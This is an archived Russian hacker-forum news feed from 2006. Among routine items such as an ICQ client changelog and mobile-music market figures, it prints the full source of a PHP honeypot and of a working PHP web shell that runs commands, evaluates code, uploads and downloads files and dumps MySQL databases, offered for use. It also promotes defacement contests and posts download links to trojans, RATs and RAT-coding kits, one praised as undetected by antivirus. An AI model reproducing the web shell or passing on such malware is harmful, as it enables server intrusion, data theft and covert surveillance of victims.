Архив новостей (2004-2015 год)

Winux · 23.05.2006

QIP 2005 Build 7920
http://news.xss.pro/qip.jpg
QIP 2005 заканчивает тестирование. В конце лета ожидается финальная версия самого хорошего ICQ клиента. Это последний релиз квипа альфа версии (разве что будет изменяться протокол). Так что следите за обновлениями.

Добавлено:
- опционально: всплывающие сообщения поверх полноэкранных приложений;
- опционально: автоматическое изменение высоты главного окна в соответствии с количеством контактов;
- режим компактного вида для главного окна. Двойной клик на заголовке окна включает/выключает режим;
(при этом правый клик на заголовке или на кнопках заголовка главного окна открывают контекстные
меню для выбора онлайн статусов, приватных статусов, настроек и статус картинки);

Исправлено/Обновлено:
- [исп] невозможно открыть главное окно если оно было прикрепленно к краю экрана;
- [исп] авто-смена статусов при разблокировании рабочей станции;
- [исп] размер всплывающей подсказки контакта при нестандартных установках dpi;
- [исп] в окне истории открывался _botlog вместо _srvlog при выборе пункта в главном меню;
- [исп] неверно подсчитывались координаты всплытия окна выбора статус картинок и всплывающих подсказок в мультимониторной конфигурации;
- [исп] счетчик онлайн контактов в режиме групп при их перемещении;
- [исп] анти-спам бот для сообщений об авторизации;
- [обн] авто-отключение фоновой картинки при выборе цвета фона окна сообщений;
- [обн] удаление нечитаемых символов в полученных сообщениях;
- [обн] копирование/вставка, перетаскивание графических смайлов вместе с текстом;
(при этом количество вставляемых графических смайлов ограничено для сбережения ресурсов)
- [обн] расположение кнопок OK/Отмена в соответствии со стандартом windows;
- [обн] выбор статус сообщений из контекстного меню системного лотка(трея);
- [обн] библиотека прикрепления главного окна к краям экрана;
- [обн] идентификация клиентов;
- [обн] модули установки/удаления программы;
- [обн] поиск по ключевым словам;
- [обн] незначительные обновления в коде и протоколе;
- [обн] совместимость с официальными веб клиентами;[New$paN]

:zns5:

Скачать|Download

Winux · 23.05.2006

Для тех кто не в танке - honeypot - программа/скрипт имитирующая уязвимость, а на самом деле следящая за хакером, который пытается ее эксплуатировать.
В горшке с медом от Сквозного есть функция отсылки лога атак на маыло с указанием IP взломщика и типа атаки. Пополнять лист уязвимостей можно редактируя массив в $includevars.[New$paN]

Код:

<?php

/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
  ____ _   _ ____  __         __                                      * 
 / ___| | | |  _ \| _|__ _   |_ |                                     *     
| |   | | | | |_) | / __| | | | |                                     *
| |___| |_| |  __/| \__ \ |_| | |                                     * 
 \____|\___/|_| (_) |___/\__,_| |                                     * 
                  |__|       |__|                                     *
                                                                      *
php_honey by skvoznoy                                                 *
rsp: Benny_a29,gema,Zaco,k0pa,payhash,Sky_Out,CRv,KEZ,ven000m, YooogI *                 *  
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

$logfile = 'kids.log';
$collectiondir = 'kids/';
$alertemail = 'admin@cup.su';

$includevars = array(
	'Key_bug1',
	'Key_bug2',
	'Key_bug3',
);

foreach ($includevars as $incvar) {

	if ( (isset($_GET[$incvar])) && (($_GET[$incvar])) ) {

  $incpath = $_GET[$incvar];

  if (preg_match("/^http:\/\//", $incpath)) {

  	$fd = fopen($logfile, "ab");
  	fwrite($fd, date('r')."\n".print_r($_GET, true)."\n-----------------\n\n");
  	fclose($fd);

  	$newfilename = date("Y-m-d--H-i-s").'_'.randstring(3).'.kids';
  	$out = fopen($collectiondir.$newfilename, 'wb');

  	$ch = curl_init($incpath);
  	curl_setopt($ch, CURLOPT_HEADER, 0);
  	//curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  	curl_setopt($ch, CURLOPT_FILE, $out);
  	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  	curl_setopt($ch, CURLOPT_MAXREDIRS, 5);
  	curl_setopt($ch, CURLOPT_USERAGENT, '-');
  	curl_setopt($ch, CURLOPT_REFERER , '-');
 
  	$httpdata = curl_exec($ch);

  	if (!curl_errno($ch)) {




  	} else {
    //echo curl_error($ch);
  	}

  	curl_close($ch);

  	mail($alertemail, "kids_dump", "Got something.\n\n".date('r')."\n\n");

  }

	}

}

function randstring($length) {
	mt_srand((double)microtime()*1000000);
	$newstring="";
	if($length > 0){
  while (strlen($newstring) < $length){
  	switch(mt_rand(1,3)){
    case 1: $newstring.=chr(mt_rand(48,57)); break; // 0-9
    case 3: $newstring.=chr(mt_rand(97,122)); break; // a-z
  	}
  } 
	}
	return $newstring;
}

?>

Сквозной жжот вообщем.
Источник: http://cup.su/

Также автор выделяет такие ханипоты как:
1) The "Google Hack" Honeypot
2) PHP.hop

Winux · 25.05.2006

AIO Astalavista DVD
Кому неизвестна великая асталявиста? Крупнейший закрытый архив программ и документов по комп безопасности. Естесственно иностранный. Ну так вот этот самый DVD диск, выложенный на рапиде, стоит порядка 100 баксов. У вас есть шанс скачать его бесплатно. Комменты авторов:

Astalavista's Security Toolbox DVD v1.0 is considered to be the largest and most comprehensive Information Security archive.As always we are committed to provide you with a resource for all of your security and hacking interests, in an interactive way! The Information found on the Security Toolbox DVD has been carefully selected, so that you will only browse through quality information and tools.No matter if you are a computer enthusiast, a computer geek, a newbie looking for information on "how to hack", or an ITSecurity professional looking for quality and up to date information for offline use or just for convenience, we are sure that you will be satisfied, even delighted by the DVD!

Winux · 25.05.2006

Hacker CD V. 2.0
итак, еще один проект диска для хакеров. Думаю для тех кто знает английский, будет нетрудно перевести комменты авторов:

It`s free to download, no 0190-dialer etc., the interesting stuff on this CD is in the "Bonus" Directory, many Tutorials about Hacking & Cracking in English Language ( not German ) and a lot of C-Codes ( spl0its, haX,... ) for GNU-Linux/BSD, imao a good choice for beginners, don`t look @ the toolz, they are well known ( sub7, netbus, brutus, cain, .... ) the interesting stuff is in the Bonus-Directory

[New$paN]

Скачать|Download 117 MB

Winux · 25.05.2006

http://news.xss.pro/defs.gif
Долгое затишье среди скрипт-кидисов закончилось!
Приглашаем ТЕБЯ на новый Независимый Проект "DefaceDataBase"
Новая База Данных зеркал ЛУЧШИХ Дефейсов интернета!
Заходи посмотреть на красивые зеркала или оставь свой, незабываемый дефейс!
На сайте будут проходить переодические конкурсы на лучшие взломы/дефейсы. Наш сайт будет активно сотрудничать с администрацией базы.
:zns2: DefaceDataBase
Также ни в коем случае не забываем про НАШУ ДЕФЕЙС ЛЕНТУ.[New$paN]

Robin Gud · 26.05.2006

Недавно вышел релиз от Cyber Lords. PHP Shell с очень компактным кодом. Функций в нём не меньше, чем в существующих на данный момент шеллах, включая встроенный SQL Client. Но вес шелла значительно меньше, всего 35кб (в несколько раз меньше существующих аналогичных продуктов), всё компактно, без лишних нагрузок графикой и ненужными вещами.

:zns5:

Скачать|Download

Winux · 28.05.2006

Х.О.З.Е 2
Вышел уже второй выпуск почти культового журнала для одептов и про одептов

. Группа продолжателей культа БэХоЦе открыли журнал про хек-сцену. В журнале масса ненаормативной лексики. Журнал расчитан на любителя культа, так что те кто негативно относятся к БэХоЦе могут не качать. Журнал повествует о событиях хек-сцены на языке одептов. Грубо говоря, я эту "фигню" читаю, особенно меня прет откартинок, прилагающихся к каждому выпуску.[New$paN]
:zns5:

Скачать|Download - первый выпуск
:zns5:

Скачать|Download - второй выпуск

Гадости в комментах не пишите, знаю что мнение сцены расходится на любителей и нелюбителей культа.

Robin Gud · 28.05.2006

r57shell 1.31
В новой версии:
- добавлена проверка возможности обхода ограничений safe_mode, копирование файлов функцией copy() с "compress.zlib://"
- информация о системе получаемая через вызов команд сохраняется в файлах cookie для уменьшения количества вызовов
командного интерпритатора
- удалены функции отображения картинок, теперь text only
- исправлена ошибка приводящая к вылету apache при работе в windows
- сделаны мелкие косметические исправления кода

:zns5:

Скачать|Download

Winux · 30.05.2006

Новый раздел & много мелких изменений
Портал претерпел несколько изменений, несколько еще предстоит. Рекомендую прочитать всем, так как скоро это вас каснется.
1) Раздел ОСи и дрова разделен на Windows и *NIX
2) Были изменены маски доступа к разделам. Везде разрешена загрузка файлов.
3) Скоро будет проведена перемодерация халявы и из нее будут исключены
- юзеры с низким рейтингом
- юзеры, которые накопили 30-40 постов отписались а теперь только клянчат
- олени, коорые по постам достойны там быть, а по уровню - нет
- юзеры с маленьким кол-вам постов (те кто попал туда по блату и не оправдал себя, чьи посты были потерты и их кол-во уменьшилось)
- юзеры, которые не постили по делу на портале с 1 апреля 2006.
Поблажки будут сделаны:
- юзерам, выложившим что либо в халяву
- юзерам, писавшим статьи, видео и пр
- юзеры с положительным рейтингом (некоторые)
- бывшим модерам (не всем)
4) Будет повышена планка для попадания в халяву до 50 постов. Так что торопитесь.

2 N1TR0x, Ma-stiff & Great:
При открытии юзерам халявы, необходимо помимо маски халявщиков установить маску "юзеры" для просмотра всех основных форумов. Этоже относится и к остальным закрытым разделам.[New$paN]

Winux · 30.05.2006

http://news.xss.pro/mob_music.jpg
Интересный факт, меня всегда интересовало, что если у людей хватает денег рекламировать закачку музона по центральным каналам, сколько же они на этом огребают. Мобильник щас есть у каждого третьего жителя РФ и если каждый качнет....сколькож это прибыли.
наконец я нашел инфу по этому вопросу. Читаем далее...[New$paN]
Согласно отчету eMarketer, доходы от продаж мобильной музыки вырастут с $434 млн в 2005 г до $7,75 млрд в 2010 г. К этому же сроку продажи музыки через цифровые каналы составят 35% от всего объема продаж, и 65% из них будут осуществляться через сотовые телефоны. При этом за указанный период доходы всей музыкальной индустрии увеличатся с $31 млрд до $34 млрд, а цифровые продажи этого вида продукции - с $1,09 млрд до $11,9 млрд.

Все больше устройств и гаджетов поддерживают загрузку музыки через сотовые сети. Стимулом для потребления такого контента часто является покупка "музыкальной" модели сотового телефона. Однако, как показал декабрьский опрос взрослых американцев, проведенный Gallup, домашние хозяйства с доходами менее $30 тыс. в год ограничены в возможностях пользования мобильной музыкой из-за недоступности соответствующих устройств – подходящий сотовый телефон есть только у половины из них. Качество музыки в мобильниках продолжает оставаться далеким от hi-fi. Также развитие данного вида бизнеса тормозит относительная дороговизна сервисов.

В течении последних двух лет загрузки музыкальных произведений через сотовый телефон производились главным образом «фанами», считает Джон Гонт (John Gauntt), старший аналитик eMarketer, автор доклада. Теперь же, по его мнению, мобильная музыка становится массовым рынком с массовыми вкусами, и индустрия должна строить маркетинговую и ценовую политику соответственно.

Отметим, что как показало исследование, проведенное TNS в конце 2005 г, ведущими странами по загрузке музыки на мобильники являются Южная Корея (это делают регулярно 26% опрошенных) и Гонконг (23%), на третьем месте Бразилия (22%). Россия в данном рейтинге находится на четвертом месте (21% респондентов, учитывались только городские территории).

Winux · 31.05.2006

http://news.xss.pro/pol_root.jpg
Прежде всего это книга ХУДОЖЕСТВЕННАЯ, но про хацкеров.
Главный герой книги - хакер Ринат, состоящий в клане Dark Souls. В противовес им в сети есть два самых могущественных клана, соперничающих друг с другом, Сталкеры и Волки. В то время, хакеры уже стали опасными преступниками для правительства и была организована сетевая полиция. Начальник ее - ненавидящий всех хакеров, Джет с противной несходящей с лица улыбкой. И вот в сети появляется открытый контракт на 5 миллионов долларов. Все что нужно это получить рутовый доступ к серверу одной психической лечебнице в Украине. И начинается хаос. Кто посмеет попробовать выполнить его, тут же погибает. Все в напряжении и понимая что ничего хорошего не будет все-равно идут на дело. А что дальше? И кто же такая Alice? Закачка далее...[New$paN]
:zns5:

Скачать|Download
Источник: web-hack.ru

Winux · 31.05.2006

VB Master Kit 2006
По заверению авторов, этот пак - мечта всех ВБ кодеров. Содержит книги, тулзы для WinAPI, много сорсов, примеров и прочей ерунды. Также внимание заострено на создании RAT приложений, тоесть троев, бэкдоров и прочей мешуры.
Сам потихоньку буду выкачивать ибо вес пака чуть больше 120 метров.
Кто скачает - отпишитесь. Закачка далее. Закачка далее...[New$paN]
:zns5:

Скачать|Download
:zns3:

Пароль: hackerscenter

Winux · 31.05.2006

C++ Master Kit 2006
Точно такойже пак, как и в соседней теме по Visualbasic. Куча книжек, статей, тулз. Много всего по WinAPI для C++. Есть исходники, примеры. И как в паке для VB - много посвящено кодингу троев и бэкдоров.
Пак весит чуть меньше 100 метров. закачка далее....[New$paN]
:zns5:

Скачать|Download

Winux · 31.05.2006

Delphi Master Kit 2006
Еще один пок из серии Мастер кит 2006. В него входит все тоже самое что для ВБ и C++, только сейчас уже для Делфи. Вообщем для тех кто не в танке, в паке есть справочники, тулзы для WinAPI, примеры и исходники клиент-серверных приложений: троянов, бэкдоров итд.
:zns5:

Скачать|Download
[mod][Winux:] Ссылка обновлена 4.09.08[/mod][New$paN]

Winux · 03.06.2006

"PaperX" - Best Beginners Delphi RAT Coding Tutorial!
Еще один пак-мануал по созданию систем удаленного наблюдения: троянов, бэкдоров итд в Делфи. Ориентирован на полного лама, поэтому не требует никаких особенных знаний или опыта (кроме английского языка). В паке описано как открывать закрывать сидюк, делать скрины экрана, воровать файлы с удаленной машины и др функции бэкдора. И все это при сравнительно небольшом весе (меньше мегабайта). В архиве примеры с исходниками. Все на английском.
:screenshot:

Скриншот|Screenshot
Заккачка далее...[New$paN]
:zns5:

Скачать|Download

Winux · 03.06.2006

Возможности:
- запросы по post'у
- встроенный mysql-клиент. быстрая возможность дампа или отдельно-взятой таблицы. для больших баз\таблиц возможно сохранение результата в файл.
- естественно php eval
- маленький обьем HTML на выходе

Все это при размере в 15 кб. Юзаем))>>[New$paN]

Код:

<?
  ##########################################################
 # Small PHP Web Shell by ZaCo (c) 2004-2006                #
 #  +POST method                                            #
 #  +MySQL Client+Dumper for DB  and tables                 #
 #  +PHP eval in text format and html for phpinfo() example #
 # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
 # For antichat.ru and cup.su friends usage                 #
 # All bugs -> mailo:zaco@yandex.ru                         #
 # Just for fun :)                                          #
  ##########################################################
error_reporting(E_ALL);
@set_time_limit(0);
function magic_q($s)
{
if(get_magic_quotes_gpc())
{
$s=str_replace('\\\'','\'',$s);
$s=str_replace('\\\\','\\',$s);
$s=str_replace('\\"','"',$s);
$s=str_replace('\\\0','\0',$s);
}
return $s;
}
function get_perms($fn)
{
$mode=fileperms($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
$head=<<<headka
<html>
<head>
<title>Small Web Shell by ZaCo</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>
textarea {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=isset($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @eval($eval_value);
else
{
echo($head.$pages);
?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?
}
break;
}
case 'cmd':
{
$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
$action=isset($_POST['action'])?$_POST['action']:'cmd';
if(@is_dir($work_dir))
{
@chdir($work_dir);
$work_dir=getcwd();
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
}
else if(file_exists($work_dir))$work_dir=realpath($work_dir);
$work_dir=str_replace('\\','/',$work_dir);
$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
switch($action)
{
case 'cmd' :
{
echo($head.$pages);
?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?=str_replace('\'',''',$cmd)?>'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120>

<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?
if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
else
{
$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
if(@is_dir($work_dir))
{
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@opendir($work_dir);
if($handle)
{
while(false!==($fn=readdir($handle))){$files[]=$fn;};
@closedir($handle);
sort($files);
$not_dirs=array();
for($i=0;$i<sizeof($files);$i++)
{
$fn=$files[$i];
if(is_dir($fn))
{
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<sizeof($not_dirs);$i++)
{
$fn=$not_dirs[$i];
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
if($winda===false)
{
$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
$group=@posix_getgrgid(@filegroup($work_dir.$fn));
printf("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
printf("% 20s ",@filesize($work_dir.$fn).'B');
printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
}
echo('</pre><hr>');
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120>

<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
case 'view':
{
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
$f=@fopen($work_dir,'r');
?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?
break;
}
case 'save' :
{
$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@fopen($work_dir,'w');
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
else
{
fwrite($f,$file_text);
fclose($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=isset($_POST['fname'])?$_POST['fname']:'';
$temp_file=isset($_POST['temp_file'])?'on':'nn';
$f=@fopen($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=isset($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
Header("Content-Type:application/x-gzip\n");
$s=gzencode(fread($f,filesize($fname)));
Header('Content-Length: '.strlen($s)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
Header("Content-Type:application/octet-stream\n");
Header('Content-Length: '.filesize($fname)."\n");
Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
ob_start();
while(feof($f)===false)
{
echo(fread($f,10000));
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=isset($_POST['action'])?$_POST['action']:'query';
$user=isset($_POST['user'])?$_POST['user']:'';
$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
$db=isset($_POST['db'])?$_POST['db']:'';
$host=isset($_POST['host'])?$_POST['host']:'localhost';
$query=isset($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES utf8'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=mysql_query('show tables',$mysql_link);
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
if(!$result2)$dump_file.='#error table '.$rows[0];
else
{
$dump_file.='create table `'.$rows[0]."`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$rows[0].'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
}
}
mysql_free_result($result);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo($dump_file);
}
else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
else
{
$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
if(!$result2)echo('error table '.$table_dump);
else
{
if(!$to_file)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
if($to_file===false)
{
header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$dump_file.="create table `{$table_dump}`(\n";
for($j=0;$j<mysql_num_rows($result2)-1;$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=mysql_fetch_array($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
mysql_free_result($result2);
$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<mysql_num_rows($result2);$j++)
{
$rows2=mysql_fetch_array($result2);
$dump_file.='insert into `'.$table_dump.'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo $dump_file;
}else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
}
}
}
break;
}
case 'query' :
{
echo($head.$pages);
?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
//@mysql_query('SET NAMES utf8'); - use if you have problems whis code symbols
$result=@mysql_query($query,$mysql_link);
if(!($result))echo(mysql_error());
else
{
echo("<table valign=top align=left>\n<tr>");
for($i=0;$i<mysql_num_fields($result);$i++)
echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
echo("\n</tr>\n");
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
echo('<tr valign=top align=left>');
for($j=0;$j<mysql_num_fields($result);$j++)
{
echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
}
echo("</tr>\n");
}
echo("</table>\n");
}
mysql_close($mysql_link);
}
break;
}
}
break;
}
}
?>

Winux · 05.06.2006

BugsPrey v0.14
Хороший троян с функциями:

Менеджер файлов
Слежка за процессами
Захват экрана
Захват с веб камеры
Слежка за клавиатурой
и т.д.

На момент постинга антивирями не пасется.[New$paN]

_http://livemobile.dl2.vipserver.ru/damagelab/winux/BugsPrey.rar

Winux · 05.06.2006

Nuclear RAT Beta 8
Очень многофункциональный бэкдор.
Вот список всего того что в нем есть:

- Список всех затрояненых компов, которые онлайн по порядку (скорости пинга)
- Кейлоггер
- Слежка за экраном
- Слежка за веб камерой
